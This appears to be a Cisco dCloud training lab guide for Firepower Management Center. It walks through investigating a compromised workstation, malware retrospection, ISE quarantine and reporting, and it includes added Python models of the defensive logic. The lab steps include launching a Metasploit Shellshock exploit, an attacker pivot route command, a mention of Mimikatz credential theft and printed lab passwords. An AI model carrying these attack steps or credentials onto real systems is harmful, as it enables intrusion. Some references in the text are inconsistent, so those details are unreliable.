1. From Jumper, log in to the Firepower Management Center with Chrome, using https://fmc ( or https://198.18.133.10 ) with
Username: admin and password: C1sco12345.

2. Select Analysis > Context Explorer. This is a good starting point for Security Analysts.

NOTE: Look at the Indications of Compromise - Indication by Host. One host (198.19.18.38) has experienced IoCs.

Figure 49. Indications of Compromise

NOTE: FMC collects the Indicator of Compromises (IoCs) per host, making it easy for the Security Analyst to identify the hosts that
need attention now.

3. Since host 198.19.18.38 has some Indicators of Compromise, we will investigate further by clicking the blue bar in the
Indications by Host section and choose View Host Information.

Figure 50. Indication by Host widget

4. The Host Profile should open in a separate window.

Figure 51. Host Information for Workstation-A

NOTE: Learn more about the host that may have been compromised.

FMC offers you contextual information about a potentially compromised machine, such as:
Which user is logged in to the machine now?

Which users have been logged into the machine previously?

Which operating system is running on that host? (Windows, Linux…)

Which applications have been observed to be running on that machine?

Which vulnerabilities could this machine have?

Which indicators of compromise have been seen on this machine?

Which connection events (firewall L3/L4 connections) relate to this machine?

Which file events relate (files uploaded/downloaded) to this machine?

Which malware events (files that are malware) relate to this machine?

Which IPS events relate to this machine?

5. From Host Profile, check which users have logged on the machine.

Figure 52. Host Profile

NOTE: Quiz yourself: why is it important to understand that Mordiac has been logged on to this machine?

Mordiac is currently the CFO, so he has access to critical financial reports that could be confidential.

Mordiac may eventually be promoted to CEO.

Mordiac also happens to be a domain admin, so compromising his credentials, using a tool like a keylogger or Mimikatz, could
potentially expose all the credentials of the organization!

6. From the Host Profile, check which operating system the compromised machine is running.

Figure 53. Operating Systems


7. From the Host Profile, we see a separate section, called Indications of Compromise. Check which Malware events are
associated with this host by clicking on Malware Events.

NOTE: Your results might differ slightly from those shown in this lab guide.

Figure 54. Accessing malware events from the Host Profile

Figure 55. Malware summary – summary windows

8. From the Malware Summary window, click Table View of Malware Events to see more details, such as sending and
receiving hosts, sending country, and much more.

Figure 56. Malware Summary – Table View of Malware Events

Note that you should see the known bad files downloaded earlier (Catjob2.xls and Catjob3.xls). However, the file with the zero-day
malicious macro (opportunity.xls) will likely not be classified as malware yet.

9. To view information about opportunity.xls, go to Analysis > Files > File Events. This shows a summary of the files that
transited through our NGFW. Locate the file type MSOLE2 with Disposition Unknown. Click on the down arrow at the
far left. This produces a more detailed view of these files, including the IP addresses the file was downloaded from and to,
the country of origin and the SHA-256 hash of the file:

NOTE: If you are doing this lab over a few days, you might need to expand the time frame if you don’t see the MSOLE2 unknown
file category. See screen shot below:

Figure 57. File Events – File Summary

10. To drill down even further in the network trajectory, click on the disposition symbol (the white circle) on the left of the SHA256
hash. This should take you to the Network File Trajectory page for that file. See note below and following steps if you didn’t
get the expected Network File Trajectory window.

Figure 58. File Events – investigating a fingerprint

NOTE: Because of an issue in this lab (being investigated) you may not be taken to the Network File Trajectory but instead see the
webpage frozen at "Loading". If necessary, use the workaround in the following step.

11. Perform this workaround only if you did not get to the Network File Trajectory in the previous step. Go to
Analysis > Files > Network File Trajectory. Then look at "Recently Viewed Files" and click on the link for the file opportunity.xls
corresponding to the SHA-256 hash above.

Figure 59. Perform this step only as a workaround if Network File Trajectory didn’t appear above

12. Inspect the Network File Trajectory. It shows which computers have downloaded the file, from which
host, and when each transfer happened. It also shows the Threat Score, which is the result of the Dynamic Analysis
(sandboxing). This file has a high threat score. Click on the three dots (step 1 in the screen capture below) next to the high
threat score and a summary of the Dynamic Analysis opens. Click on View Full Report (step 2) to get to the Threat
Grid Analysis Report for further details; it opens in a new browser tab.

13. Inspect the full analysis from AMP Threat Grid. This gives a lot of information about the behavior of the file.

Note: Look at the behavioral indicators, which suggest that this is malware. One of the indicators is the fact that this Office
document tried to establish network communications to www.trustme.cat. Even though this server was not reachable during the
dynamic analysis (the server exists only inside the lab), Threat Grid flagged this as suspicious behavior for an Office document.
Combined with the other behavioral indicators, it was enough to give the file a high threat score. Coming up: more explanation of
how Cisco Talos deals with high threat scores discovered by Threat Grid; obviously, you would want Threat Grid to share those
high threat scores with the AMP file reputation service.

Figure 60. Threat Grid Analysis Report from the Dynamic Analysis of the malware detected by FTD

14. Understanding Retrospection: Go back to Analysis > Files > Network File Trajectory. Be patient; due to our dCloud lab
environment, it might take a minute for the page to open. If after one minute the page is still at "Please Wait...", attempt a
browser refresh.

15. Select the file Job-Obscense-Salary.xls with the SHA-256 ending in f778 by clicking on its hash. You will notice that the
file has a high threat score from Threat Grid. In a production environment, Threat Grid would communicate its findings to the
AMP cloud, which in turn could use this information to retrospectively convict the file, sending retrospective events to all
AMP connectors (AMP for Endpoints and Firepower devices) across the world that had queried about that file. The file disposition
would then change from Unknown to Malware. An example of what this would look like is shown below. CAUTION: This is only an
example. You will not see this in our lab.

Figure 61. YOU WILL NOT SEE THIS IN OUR LABS: THIS IS AN EXAMPLE.

NOTE: Firepower AMP records all file transfers, regardless of disposition (unknown, clean or malware) and can change its mind
later and tell you about it! This is called retrospection!
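The hash lookup at download time, the blocking of known malware and the retrospective verdict described in steps 22, 15 and the note above can be modelled in a few lines. The following Python is an added example written for this guide; it is not Firepower or AMP code and it contacts no cloud service. The reputation store, the file contents, the sender names and the Catjob/opportunity file names as used here are constructed for the example; only Workstation-A's address (198.19.18.38) comes from the lab.

```python
import hashlib
from dataclasses import dataclass, field

# The three file dispositions FMC shows for a file event.
MALWARE, CLEAN, UNKNOWN = "Malware", "Clean", "Unknown"


def sha256_hex(data: bytes) -> str:
    """Fingerprint the file the way the firewall does: SHA-256 over the whole content."""
    return hashlib.sha256(data).hexdigest()


@dataclass
class FileTransfer:
    sha256: str
    name: str
    src: str
    dst: str
    disposition: str          # disposition at the time of the transfer


@dataclass
class ReputationService:
    """Constructed stand-in for the AMP cloud lookup: hash -> disposition."""
    known: dict = field(default_factory=dict)

    def lookup(self, sha256: str) -> str:
        return self.known.get(sha256, UNKNOWN)


@dataclass
class FileInspector:
    """Models the firewall's file policy: fingerprint, look up, allow/block, record."""
    reputation: ReputationService
    transfers: list = field(default_factory=list)   # every transfer, any disposition

    def inspect(self, name: str, data: bytes, src: str, dst: str):
        digest = sha256_hex(data)
        disposition = self.reputation.lookup(digest)
        # Record the transfer whatever the verdict; retrospection depends on this.
        self.transfers.append(FileTransfer(digest, name, src, dst, disposition))
        # Known malware is blocked (the last segment is withheld); Unknown and Clean
        # files are delivered, Unknown ones being submitted for dynamic analysis.
        action = "block" if disposition == MALWARE else "allow"
        return digest, disposition, action

    def retrospective_update(self, sha256: str, new_disposition: str):
        """A later verdict for a hash: update the store and raise one retrospective
        event per host that already received the file under the old disposition."""
        self.reputation.known[sha256] = new_disposition
        events = []
        for t in self.transfers:
            if t.sha256 == sha256 and t.disposition != new_disposition:
                events.append({"host": t.dst, "file": t.name,
                               "old": t.disposition, "new": new_disposition})
                t.disposition = new_disposition
        return events


def run_demo():
    """Replays the two downloads of the lab with constructed file contents."""
    catjob3 = b"constructed stand-in for Catjob3.xls"
    opportunity = b"constructed stand-in for opportunity.xls with a zero-day macro"
    # Constructed reputation store: only the Catjob file is already known bad.
    amp = ReputationService(known={sha256_hex(catjob3): MALWARE})
    fw = FileInspector(amp)
    # Workstation-A pulls the known-bad file: blocked at lookup time.
    first = fw.inspect("Catjob3.xls", catjob3, "www.evilchi.com", "198.19.18.38")
    # The unknown macro file has no reputation yet, so it is allowed through.
    second = fw.inspect("opportunity.xls", opportunity, "evil2", "198.19.18.38")
    # Sandbox verdict arrives later; every prior recipient gets a retrospective event.
    retro = fw.retrospective_update(sha256_hex(opportunity), MALWARE)
    return first, second, retro


if __name__ == "__main__":
    for item in run_demo():
        print(item)
```

The retrospective event list is the part worth keeping: it names the hosts that already have the file and must now be investigated, which is exactly what FMC turns into a retrospective malware event and an Indication of Compromise on the host.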

16. Optional step, to confirm that the MSOLE2 file was captured by FTD and sent to Dynamic Analysis: go
to Analysis > Files > Captured Files. From the Captured File Summary window, click on Table View of Captured Files
and confirm that the Dynamic Analysis is completed.

Figure 62. Confirming that Dynamic Analysis took place: Captured Files

17. Next, conduct a high-level investigation of the intrusion attempt. Go to Analysis > Intrusions > Events, select Table View of
Events. From the Source IP column, click on the red computer icon for address 198.19.18.38. This will open the Host Profile.
(note that Firefox might open the Host Profile in a minimized window). From the Host Profile, select any of the magnifying
glasses of the Impact 2 Attack row.

Figure 63. Host Profile: Select Impact 2 Attack

NOTE: We can quickly see that this is a high-priority, Impact 2 alarm (host potentially vulnerable). We see that the attack was
blocked, that the attacker was the IP address of Workstation-A, a client on the inside, that the victim was the IoT device, and
that the attack was a Bash CGI environment variable injection (aka Bash Shellshock).

What does the IMPACT level represent? Impact levels correlate the intrusion event with the network discovery data and the
vulnerability information. The IPS event's own priority is re-adjusted according to the context of the target (which
OS is running, which applications and ports are in use, which vulnerabilities are mapped to the host), most of which is learned by
Network Discovery. Impact 1 means the target is known to be vulnerable; Impact 2 that it is potentially vulnerable (the targeted
service is in use but no matching vulnerability is mapped); Impact 3 that it is currently not vulnerable; Impact 4 that the target is
on a monitored network but has no entry in the network map; and Impact 0 that neither host is on a monitored network.
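The re-adjustment of an IPS event against the network map can be written down as a small decision function. The Python below is an added example for this guide, not Firepower code, and it is an approximation: it looks only at the destination host, whereas FMC also considers the source. The network map, the IoT device address (198.19.10.211), the second target addresses and the open-port and CVE data are constructed; Workstation-A's address and the Shellshock CVE (CVE-2014-6271) are real.

```python
import ipaddress
from dataclasses import dataclass, field

IMPACT_LABELS = {
    0: "Unknown",                   # neither host is on a monitored network
    1: "Vulnerable",                # target in the network map with a matching vulnerability
    2: "Potentially Vulnerable",    # target in the map and the attacked service is in use
    3: "Currently Not Vulnerable",  # target in the map, attacked service not in use
    4: "Unknown Target",            # monitored network, but no host entry for the target
}


@dataclass
class HostProfile:
    """What Network Discovery knows about one host (constructed for the example)."""
    ip: str
    os: str
    open_ports: set = field(default_factory=set)       # {(proto, port), ...}
    vulnerabilities: set = field(default_factory=set)  # {"CVE-...", ...}


@dataclass
class IntrusionEvent:
    src: str
    dst: str
    proto: str
    dst_port: int
    msg: str
    cves: set = field(default_factory=set)   # vulnerability references on the rule


def impact_level(event, hosts, monitored_networks):
    """Approximate FMC impact flag for one event, judged on the destination host."""
    target = ipaddress.ip_address(event.dst)
    if not any(target in net for net in monitored_networks):
        return 0
    host = hosts.get(event.dst)
    if host is None:
        return 4
    if event.cves & host.vulnerabilities:
        return 1
    if (event.proto, event.dst_port) in host.open_ports:
        return 2
    return 3


def run_demo():
    """Scores a few constructed intrusion events against a constructed network map."""
    monitored = [ipaddress.ip_network("198.19.0.0/16")]
    # The IoT device address and its profile are made up for this example.
    iot = HostProfile("198.19.10.211", "Linux", open_ports={("tcp", 80)})
    hosts = {iot.ip: iot, "198.19.18.38": HostProfile("198.19.18.38", "Windows")}
    shellshock = {"CVE-2014-6271"}   # Bash CGI environment variable injection

    def score(dst, port):
        ev = IntrusionEvent("198.19.18.38", dst, "tcp", port,
                            "Bash CGI environment variable injection", shellshock)
        level = impact_level(ev, hosts, monitored)
        return level, IMPACT_LABELS[level]

    results = {
        # Web server in use on the target, no vulnerability mapped yet: Impact 2,
        # which is what the lab shows for the attack on the IoT device.
        "iot_http": score(iot.ip, 80),
        # Same payload at a port the target does not serve.
        "iot_https": score(iot.ip, 443),
        # Target inside the monitored range but never seen by discovery.
        "unknown_host": score("198.19.10.250", 80),
        # Target outside every monitored network.
        "outside": score("203.0.113.9", 80),
    }
    # Once a scan (or an OS/service match) maps CVE-2014-6271 onto the target,
    # the same event is promoted to Impact 1.
    iot.vulnerabilities.add("CVE-2014-6271")
    results["iot_http_mapped"] = score(iot.ip, 80)
    return results


if __name__ == "__main__":
    for name, (level, label) in run_demo().items():
        print(f"{name:16} impact {level} ({label})")
```

The practical point is the last case: the same IPS event moves from Impact 2 to Impact 1 without any change on the wire, purely because the network map learned more about the target. That is why keeping host vulnerability data current matters as much as keeping the rule set current.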

Figure 64. High level Investigation

18. Note how this mirrors the attack from Scenario 1. Evil2 (listed simply as evil in the figure below) got a foothold on
Workstation-A (198.19.18.38), which was then used as a springboard to reach 189.19.10.211.

Figure 65. Attack path: Evil -> Workstation-A -> IoT

NOTE: This intrusion event maps to the earlier attack attempt against the IoT device. The compromised Workstation-A is
on the inside of the network (after connecting with VPN) and can be used for pivoting to other systems.

19. Let's investigate the Security Intelligence Events of our compromised Workstation-A. From your current location, the Events
By Priority and Classification window, click on the red computer icon for 198.19.18.38. This opens, yet again, the Host
Profile page. If you are no longer at the Events By Priority and Classification window, click on Analysis >
Intrusions > Events, select Table View of Events and click on the red computer icon of 198.19.18.38 to open the Host Profile.

20. Now, from the IoC section of the Host Profile page, click on any of the magnifying glasses on the CnC Connected row. CnC
stands for Command and Control.

Figure 66. Host Profile

21. This will open the Security Intelligence Events page, showing that our client is trying to contact a CnC server located in the
USA.

Figure 67. Security Intelligence Events

Conclusion

This concludes the Detection/Analysis scenario. To summarize:

 We noticed a host, Workstation-A, which had several Indications of Compromise.

 We first examined the host information, which told us about the operating system, applications etc. It also told us that the user
logged on to the host at the time of the event was Mordiac, the current CFO and a domain admin.

 Investigating the malware events showed us that Workstation-A had opened an Excel file from a server in China. This file's
reputation was at first unknown to AMP, so the firewall had to let it into the network while it was being checked by
dynamic analysis. At a later stage, the file was found to have a high threat score.

 The dynamic analysis of this file also tells us about the nature of the file: an Excel workbook with several suspicious
characteristics. Complementary analysis from Threat Grid would have shown that this was zero-day malware, which
would have triggered a retrospective event.

 We also learned that Workstation-A has attempted to attack the critical IoT device. This attack was blocked by the IPS.

 We also learned that Workstation-A is communicating with a known CnC in the USA. This traffic is blocked.

Scenario 4. Rapid Threat Containment


In this scenario, we will show how Firepower Management Center and Cisco Identity Services Engine (ISE) can be integrated to
automatically quarantine a device. The FMC will use a correlation policy, which defines conditions and actions (IF ... THEN),
in this case an attack from a client on a certain subnet, and ties that to a remediation: informing ISE that the source IP address
should be quarantined.

ISE, in turn, will send a Change of Authorization (CoA) to the Network Access Device (NAD) responsible for providing network
access to this misbehaving client. In our case, the NAD is FTDv, which is the VPN concentrator for Workstation-A. Upon
receiving the CoA request from ISE, FTD re-authorizes the VPN endpoint. The CoA can push to the NAD, for
example, either a new restrictive access list to be applied to the endpoint session, or a redirect to a quarantine server when the
endpoint attempts to browse. Noteworthy: ISE can perform a Change of Authorization on a host, such as
quarantining it, regardless of whether the endpoint is connected via wired, wireless or VPN.

1. On FMC, navigate to Policies > Correlation. The Correlation Policy AttackfromClientPolicy2 has been preconfigured but
not yet activated. Click on the activation button to change the X into a checkmark.

Figure 68. Activating a Correlation policy

2. Next, let's see what happens when a corporate client attempts to conduct an attack that transits through our FTD. From
Jumper, you should still have an MTPuTTY session to evil2. This SSH session should still be at the Metasploit prompt. Type
exploit to attempt another Bash Shellshock attack. If you don't have a connection open to evil2, from Jumper's desktop,
click on the mtputty icon, select evil2, and type exploit. Alternatively, see the note below the figure.

Figure 69. SSH session on evil2, with Metasploit in the foreground.

If you accidentally closed the Metasploit connection and don't wish to go through the trouble of starting another exploit, you can
instead use a (less realistic) attack: go to Workstation-A, open Firefox and click on one of the IPS Test links. This triggers
an older type of attack, circa 2000, using cmd.exe against an IIS directory traversal vulnerability. This attack in turn triggers
an IPS alert (sig ID 1002) for Workstation-A.

Figure 70. Alternative attack method (less realistic) in case the metasploit connection was lost.

3. Now that the correlation rule has been activated on FMC, Workstation-A should have been put in the quarantine state the
moment the exploit was detected by FTD. In our case, for quarantining, the ISE policy redirects web browsing to a remediation
server. In production, ISE would probably also push a very restrictive dynamic ACL to the Network Access Device (switch,
WLC or VPN concentrator). Browsing to any destination except www.cisco.com* from Workstation-A should redirect the client to the
following quarantine server page:

NOTE: If Firefox doesn't redirect you to the remediation portal, use Chrome.

*Cisco.com is cached, so go to another website to test the redirection.

Figure 71. Remediation Portal

Conclusion

This concludes the fourth scenario. To summarize what has happened:

 From FMC, you activated a correlation policy that says: if a host shows malicious behavior, then tell ISE to remediate/quarantine the host.

 An IPS alarm was triggered on FTD when the exploit command was issued on Evil2. The IPS alarm then triggered the
correlation rule on Firepower.

 The correlation rule on our FMC says: if IPS is triggered for a Source IP in 198.19.18.0/23, then respond with Mitigation. The
mitigation action configured on our FMC is to send a quarantine request to Cisco ISE for the offending source IP.

 Cisco ISE is configured to react to a quarantine request not with a hard quarantine, but with a URL
redirect to a remediation portal when the offending host attempts to browse the internet.

 When Workstation-A tried to browse, it was therefore redirected to our remediation page.
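The chain summarized above (IPS event, correlation rule on the source subnet, quarantine request to ISE, CoA to the NAD that owns the session) is small enough to model end to end. The Python below is an added example for this guide; it is neither FMC nor ISE code and it does not speak pxGrid or RADIUS. The session table, the second endpoint address, the IoT target address and the rule message text are constructed; the subnet 198.19.18.0/23, the policy name AttackfromClientPolicy2, Workstation-A's address and the NAD FTDv come from the lab. It also adds one check a production integration needs that the lab does not mention: a host that is already quarantined is not re-quarantined on every subsequent alert.

```python
import ipaddress
from dataclasses import dataclass, field


@dataclass
class IntrusionEvent:
    src: str
    dst: str
    sid: int
    msg: str


@dataclass
class CorrelationRule:
    """IF an intrusion event has a source address in src_subnet THEN run the remediation."""
    name: str
    src_subnet: str

    def matches(self, ev: IntrusionEvent) -> bool:
        return ipaddress.ip_address(ev.src) in ipaddress.ip_network(self.src_subnet)


@dataclass
class IseStub:
    """Constructed stand-in for ISE: knows which NAD owns each endpoint session and
    records the Change of Authorization it would send. Not the real ISE API."""
    sessions: dict                                # endpoint IP -> NAD name
    coa_log: list = field(default_factory=list)
    quarantined: set = field(default_factory=set)

    def quarantine(self, ip: str):
        nad = self.sessions.get(ip)
        if nad is None:
            # No active session for that IP: there is nothing to re-authorize.
            return None
        if ip in self.quarantined:
            # Already quarantined; another CoA would only churn the session.
            return None
        coa = {"endpoint": ip, "nad": nad, "action": "CoA-Reauth",
               "authorization": "Quarantine (URL redirect to remediation portal)"}
        self.coa_log.append(coa)
        self.quarantined.add(ip)
        return coa


class CorrelationEngine:
    """Models the FMC correlation policy: evaluate each rule, fire its remediation."""

    def __init__(self, rules, ise: IseStub):
        self.rules = rules
        self.ise = ise
        self.correlation_events = []   # what FMC would log as correlation events

    def process(self, ev: IntrusionEvent):
        fired = []
        for rule in self.rules:
            if not rule.matches(ev):
                continue
            coa = self.ise.quarantine(ev.src)
            self.correlation_events.append({"rule": rule.name, "src": ev.src,
                                            "sid": ev.sid, "coa_sent": coa is not None})
            fired.append((rule.name, coa))
        return fired


def run_demo():
    rules = [CorrelationRule("AttackfromClientPolicy2", "198.19.18.0/23")]
    # Constructed session table: Workstation-A is a VPN session on FTDv; the other
    # endpoint and its switch are made up for the example.
    ise = IseStub(sessions={"198.19.18.38": "FTDv", "198.19.20.7": "switch-1"})
    engine = CorrelationEngine(rules, ise)
    events = [
        IntrusionEvent("198.19.18.38", "198.19.10.211", 1002, "IIS cmd.exe access (constructed msg)"),
        IntrusionEvent("198.19.18.38", "198.19.10.211", 1002, "IIS cmd.exe access (constructed msg)"),  # repeat
        IntrusionEvent("198.19.20.7", "198.19.10.211", 1002, "IIS cmd.exe access (constructed msg)"),   # outside /23
    ]
    outcomes = [engine.process(ev) for ev in events]
    return outcomes, ise.coa_log, engine.correlation_events


if __name__ == "__main__":
    outcomes, coa_log, corr = run_demo()
    print("CoA sent:", coa_log)
    print("correlation events:", corr)
```

Note the third event: 198.19.20.7 is just outside 198.19.18.0/23 (which spans 198.19.18.0 to 198.19.19.255), so the rule never fires for it, no matter how loud the IPS alert. When you write the real correlation rule, check the subnet boundary the same way before trusting it.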

Scenario 5. Reporting
In this scenario, we will focus on the FMC Dashboards and Reporting. FMC provides rich and customizable data analysis and
reporting. In the short time available, we will only briefly explore this vast topic.

Steps
1. From the Jumper, open Chrome and logon to FMC (https://fmc), using username: admin and password: C1sco12345.

2. Select Overview > Dashboards > Summary Dashboard 6.2.0*.

NOTE: There are many different predefined dashboards (Files, Security Intelligence and many more). Each dashboard
also has different tabs (for example, Network, Threat, Intrusion Events etc).

Also note that this dashboard is the one presented under v6.3, even though its name (6.2.0) is currently misleading.

3. Click the Threats tab. You may have to change the time window in the top right corner to see more meaningful data.

Figure 72. Summary Dashboards

NOTE: The dashboards can be used as a graphical overview and for on-demand or scheduled reporting. They can also
be used to drill into analysis, just by clicking on any of the links in the widgets. For example, under Connections by Security
Intelligence Category, you could click on the CnC link to show the list of Security Intelligence Events (CnC attempts blocked due
to the known bad reputation of the destination IP address, as classified by Talos).

Figure 73. CnC Link

4. You can Export/Import or create your own dashboard by selecting Overview > Dashboards > Management.

5. Click Create Dashboard.

Figure 74. Create Dashboard

6. From the Create Dashboard window, click on the down-arrow of Copy Dashboard, and select Summary Dashboard 6.2.0.
You might need to use the keyboard Down-Arrow if the drop-down menu of Copy Dashboard is unresponsive. Name your
new dashboard MyDashboard and click Create.

Figure 75. Create Dashboard

7. On the new dashboard, click Add Widget.

Figure 76. Add Widget

8. Click Add for the Custom Analysis widget. This very flexible widget will allow us to display data from any table with lots of
customization.

Figure 77. Custom Analysis

9. After adding your widget, go back to your dashboard by selecting Overview > Dashboards > MyDashboard. Scroll down to
find your new widget (the title bar will say Custom Analysis).

10. Customize the new widget by first clicking its top left corner, then adjusting the Table field (as an example, pick
Correlation Events), then picking which field you want to display, or any search criteria.

NOTE: It is, for example, easy to see which users are in quarantine, or to find users with a high number of NXDOMAIN
responses (a symptom of CnC attempts), etc, depending on the correlation policy.

Figure 78. Customizing a Widget

11. You can convert your customized dashboard into a Report template. Click Report Designer on the top right of Dashboard.

Figure 79. Report Designer

12. This brings you to the Report Template design, which starts with your current dashboard structure. From here, you can
modify reports, add text and a logo, switch between bar and pie charts, etc.

13. When you are finished, click Save and then click once on Generate, but do not go any further yet. (Reports can also be
generated automatically at regular intervals.)

Figure 80. Save Report Template

14. In the window Generate Report, make sure to select HTML output (there is no PDF reader installed on Jumper). Then, click
on the Generate button and then click Yes.

Figure 81. Select HTML Output and then Generate.

15. View the report by going to Overview > Reporting > Reports, and click the HTML zip, which will open the report in a new
window.

Figure 82. Reviewing a manually created custom report

16. FMC supports integrated risk reports for Malware, Attacks and Network Risks. These reports provide high-level information
aimed at upper management. Go to Overview > Reporting > Report Templates and generate an Attack Risk Report for
your review by clicking the booklet icon, then clicking on the blue HTML hyperlink to see the report. Click again on the
booklet icon if you need to regenerate the report.

Figure 83. Report Template – Generating a report

Figure 84. Example Risk Report

Conclusion

This concludes the Reporting exercise. To summarize:

 We learned how to produce and customize reports.

Appendix – Instructor Notes


INSTRUCTORS: BEFORE PRESENTING

Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front of
a live audience. This will allow you to become familiar with the structure of the document and content.

It may be necessary to schedule a new session after following this guide in order to reset the environment to its original
configuration.

PREPARATION IS KEY TO A SUCCESSFUL PRESENTATION.


Understanding the script that generates malware

At the beginning of each lab the script C:\Users\Mordiac\Desktop\Tools\Makemalware\make_and_copy_malware_v1 is
automatically run on Workstation-A.

This script creates a unique malicious Excel spreadsheet that is not already known to AMP, so it is not convicted by the initial
SHA256 lookup. If needed (for example, if the script was not run during provisioning of the lab) it can be run again manually by
double-clicking this file. This refreshes the malicious Excel file that is downloaded in Scenario 1.

Copy/paste from the PDF to the PuTTY window does not work!

Some students may try to copy/paste from the lab guide PDF into the PuTTY window instead of typing the commands. This does not
work; the students have to type the commands manually (remind them about the tab completion available in PowerShell Empire).


IPS Policies not showing (“Loading Forever”)

In some versions of the lab the IPS policies may not display, and you will get a screen that says “loading” forever. This is caused by
an issue with the saved dCloud FMC virtual machine. To solve this issue, follow the steps in the figure below: create a new policy
(2), then cancel out of this new policy creation (3), and then select Access Control > Intrusion again (4).

Scenario 3 – Opportunity.xls and Threat Grid

The file opportunity.xls is sent to Threat Grid (TG) for analysis. Note that Threat Grid does not convict files as malicious; the Threat
Score reports on the behaviour/actions of the file at one point in time.

It is entirely possible for the same file (same SHA256) to have different Threat Scores at different points in time.

Here the file gets a high threat score, but not high enough for AMP (which is informed of the Threat Score) to convict the file as
malicious. One reason for this is that the file is malicious in the lab environment only.

It relies on a CSV file being downloaded and executed, and this file is not available on the internet, only in the dCloud lab
environment. Outside the lab (in the TG environment) the file's behaviour is merely suspicious, because it tries to execute some
content but that content is never downloaded (the URL for the content only resolves in the lab).

This is a quite realistic attack scenario, where the attacker does not trigger the malware immediately (does not register the DNS name
from which the CSV file is downloaded) until later, after the sandbox has let the file through.

Rapid Threat Containment not succeeding

1. Check whether an IPS event was generated (Analysis > Intrusions). If not, double-check that the route added by the
attacker is correct: route add 198.19.10.0 255.255.255.0 1 – see the corresponding step in Scenario 1.

2. If there is an IPS event but no quarantine, it may be because the communication between FMC and ISE has hung. This
can happen under heavy dCloud load (lots of labs sharing the same resources). Analysis > Correlation > Status
would then show the error message “Could not connect to ISE”. To solve this issue, restart the relevant process on FMC: in
FMC go to System > Integration > Identity Sources, select User Agent, then Save. Then select Identity Services Engine, and
Save.
